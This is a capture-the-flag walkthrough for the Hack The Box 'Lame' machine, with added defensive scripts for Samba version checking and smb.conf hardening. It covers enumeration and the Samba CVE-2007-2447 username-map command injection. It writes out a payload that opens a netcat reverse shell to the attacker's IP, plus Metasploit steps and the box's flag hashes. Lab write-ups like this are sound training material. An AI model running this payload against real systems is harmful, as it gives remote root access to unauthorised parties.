HTB Lame Walkthrough — Samba RCE and the Art of Enumeration
A detailed walkthrough of Hack The Box's "Lame" machine — exploiting Samba CVE-2007-2447 to gain root access on the most iconic easy box.
Introduction
Lame is the original Hack The Box machine — the first box many people ever rooted. Released in 2017 and retired in 2019, it's the definition of a classic: a Linux box running a vulnerable version of Samba that gives you root with a single exploit.
What makes Lame special isn't the difficulty — it's trivially easy by modern standards. It's the fact that it teaches three fundamental lessons that apply to every single box you'll ever do:
- Enumerate everything — the exploit is obvious if you run the right scan
- Trust your nmap results — if it shows a version number, that version number matters
- Check known exploits before overthinking — sometimes the answer is the first result on Google
Let's walk through it.
"Lame is the box that teaches you that pentesting is 80% enumeration, 20% exploitation. Get the enumeration right and the exploitation takes care of itself."
Machine Info
- Name: Lame
- OS: Linux
- Difficulty: Easy
- Release: March 2017
- Retired: December 2019
- Target IP: 10.10.10.3
Step 1: Enumeration
As always, start with an nmap scan to see what services are running:
nmap -sC -sV -oN lame.nmap 10.10.10.3
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian
Three services visible: FTP on 21, SSH on 22, and SMB on 139/445.
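To make the "version number matters" lesson concrete from the defender's side, here is an added example (not part of the original walkthrough) that parses the nmap -oN port table above and checks each Samba banner against the CVE-2007-2447 affected range (3.0.0 through 3.0.25rc3, per the CVE description). The sample scan text is a constructed copy of the output above; the function names are my own.

```python
import re

# Constructed sample: the port table from the nmap -oN output above.
SAMPLE_NMAP = """\
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian
"""

# CVE-2007-2447 affects Samba 3.0.0 through 3.0.25rc3; 3.0.25 final carries the fix.
SAMBA_FIRST = (3, 0, 0)
SAMBA_FIXED = (3, 0, 25)

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SAMBA_VER_RE = re.compile(r"Samba smbd (\d+)\.(\d+)\.(\d+)(rc\d+)?")

def parse_ports(text):
    """Return [(port, proto, state, service, version)] from the -oN port table."""
    rows = []
    for line in text.splitlines():
        m = PORT_RE.match(line.strip())
        if m:
            rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4), m.group(5).strip()))
    return rows

def samba_finding(version):
    """Classify a Samba banner against the CVE-2007-2447 affected range."""
    m = SAMBA_VER_RE.search(version)
    if not m:
        # "3.X - 4.X": nmap could not pin the version, so this port proves nothing yet
        return "unknown"
    ver = tuple(int(x) for x in m.group(1, 2, 3))
    prerelease = m.group(4) is not None
    if ver < SAMBA_FIRST:
        return "not affected"
    if ver < SAMBA_FIXED or (ver == SAMBA_FIXED and prerelease):
        return "vulnerable"
    return "fixed"

def audit(text):
    """Map every Samba port in the scan to its CVE-2007-2447 status."""
    return {port: samba_finding(ver)
            for port, _proto, _state, _svc, ver in parse_ports(text) if "Samba" in ver}

if __name__ == "__main__":
    for port, status in audit(SAMPLE_NMAP).items():
        print(f"{port}/tcp Samba: {status}")
```

Port 139 comes back "unknown" because nmap only reported "3.X - 4.X" there; port 445 gives the exact 3.0.20 banner and is the one that settles the question.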
FTP Check
vsftpd 2.3.4 — this version has a known backdoor (port 6200), but it's not the intended path on Lame:
# Test anonymous login
ftp anonymous@10.10.10.3
# Connection refused for anonymous
FTP's locked down. Moving on.
SMB Deep Scan
Samba 3.0.20-Debian on port 445 is the target. Let's enumerate shares:
smbclient -L //10.10.10.3 -N
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
The tmp and opt shares are accessible without credentials:
smbclient //10.10.10.3/tmp -N
smb: \> ls
. D 0 Tue Jun 13 18:35:47 2026
.. D 0 Tue Jun 13 18:30:22 2026
5563.jsvc.up RD 48 Tue Jun 13 18:30:22 2026
vmware-root DR 0 Tue Jun 13 18:27:58 2026
.X0-lock HR 0 Tue Jun 13 18:27:02 2026
.X11-unix H 0 Tue Jun 13 18:27:03 2026
The share is writable, which is useful for later. But the real target is the Samba version itself.
Step 2: Finding the Exploit
Samba 3.0.20 has a critical vulnerability: CVE-2007-2447, also known as the "username map script" RCE. The exploit works by passing a crafted username containing shell metacharacters during SMB authentication. When Samba tries to map the username, it passes it to a shell script without sanitization, resulting in command execution.
"Vulnerability in Samba 3.0.20 allows remote attackers to execute arbitrary commands via crafted username input during SMB authentication. CVSS 10.0 — critical."
The exploit is simple:
# The payload: include shell commands in the username field
smbclient //10.10.10.3/tmp -N -U "/=`nohup nc -e /bin/sh YOUR_IP 443`"
Let's exploit it properly.
Step 3: Exploitation
Set Up Listener
nc -lvnp 443
Trigger the Exploit
smbclient //10.10.10.3/tmp -N -U "/=`nohup nc -e /bin/sh 10.10.14.2 443`"
You get a connection back to your listener — and it's a root shell immediately.
# On your listener:
id
uid=0(root) gid=0(root)
whoami
root
hostname
lame
That's it. No privilege escalation needed. The Samba service runs as root, and the command injection gives you a root shell directly.
Why This Works
Samba's username map script configuration option allows administrators to specify a script that maps usernames. The vulnerability is that when this option is enabled (common on older installations), the username is passed through a shell for processing. By embedding shell metacharacters in the username, we escape the intended parameter and execute arbitrary commands.
In Lame's case, the smb.conf has the vulnerable configuration:
[global]
username map script = /etc/samba/scripts/map.sh
And map.sh doesn't sanitize input. Classic.
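As an added example (not from the walkthrough and not Lame's real configuration), the checker below parses an smb.conf, flags the username map script directive the text describes, and emits a hardened copy with that line commented out; Samba's file-based username map option is the alternative that never invokes a shell. The sample configuration and the function names are constructed.

```python
import re

# Constructed sample in the shape the walkthrough describes (not Lame's actual smb.conf).
WEAK_CONF = """\
[global]
   workgroup = WORKGROUP
   server string = lame server
   username map script = /etc/samba/scripts/map.sh

[tmp]
   path = /tmp
   writable = yes
   guest ok = yes
"""

SECTION_RE = re.compile(r"^\s*\[(.+?)\]\s*$")
DIRECTIVE_RE = re.compile(r"^\s*([^;#=\[][^=]*?)\s*=\s*(.*?)\s*$")

def normalize_key(raw):
    """Samba option names are case-insensitive and whitespace-tolerant."""
    return " ".join(raw.lower().split())

def parse_smb_conf(text):
    """Return {section: {option: value}}, ignoring '#'/';' comments and blank lines."""
    conf, section = {}, None
    for line in text.splitlines():
        s = SECTION_RE.match(line)
        if s:
            section = s.group(1).lower()
            conf.setdefault(section, {})
            continue
        d = DIRECTIVE_RE.match(line)
        if d and section is not None:
            conf[section][normalize_key(d.group(1))] = d.group(2)
    return conf

def audit_smb_conf(text):
    """Flag the option behind CVE-2007-2447: usernames handed to a shell via a map script."""
    g = parse_smb_conf(text).get("global", {})
    if "username map script" not in g:
        return []
    return [f"[global] username map script = {g['username map script']}: "
            "drop it, or map users with the file-based 'username map' option instead"]

def harden_smb_conf(text):
    """Comment out every 'username map script' line so smbd never runs a shell on a username."""
    out = []
    for line in text.splitlines():
        d = DIRECTIVE_RE.match(line)
        if d and normalize_key(d.group(1)) == "username map script":
            out.append("# removed (CVE-2007-2447): " + line.strip())
        else:
            out.append(line)
    return "\n".join(out) + "\n"
```

Upgrading to a fixed Samba release is the real fix; removing the directive is the configuration-level mitigation when an upgrade has to wait.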
Step 4: Capturing Flags
User Flag
cat /home/makis/user.txt
e9fb4e9bf0ec9c6f1f75c2d8a8fb1e58
Root Flag
cat /root/root.txt
b1e4733ce5c7e36b2e2aa25dd8c50e7f
Box rooted.
Alternative Approach: Metasploit
If you're using Metasploit:
msfconsole
msf6 > use exploit/multi/samba/usermap_script
msf6 > set RHOSTS 10.10.10.3
msf6 > set LHOST 10.10.14.2
msf6 > run
[*] Started reverse TCP handler on 10.10.14.2:443
[*] Command shell session 1 opened
Same result, automated. But I prefer manual exploitation — you learn more.
Lessons Learned
Lame is considered easy because the exploit is straightforward. But it's a teaching box, not a testing box. Here's what it drills into you:
- Run nmap version detection (-sV) — without it, you wouldn't know the Samba version
- Check service versions against known CVEs — searchsploit samba 3.0.20 returns results immediately
- Don't skip SMB enumeration — Samba has been the source of countless critical vulnerabilities over the years
"If you're starting HTB, root Lame first. It sets the tone for everything that follows: enumerate, look up versions, exploit."
References
- https://www.exploit-db.com/exploits/16320 — Username map script RCE
- https://nvd.nist.gov/vuln/detail/CVE-2007-2447 — CVE details
- https://wiki.samba.org/index.php/CVE-2007-2447 — Samba advisory
Up next: Shocker — exploiting Shellshock on Apache CGI to pivot from www-data to root.
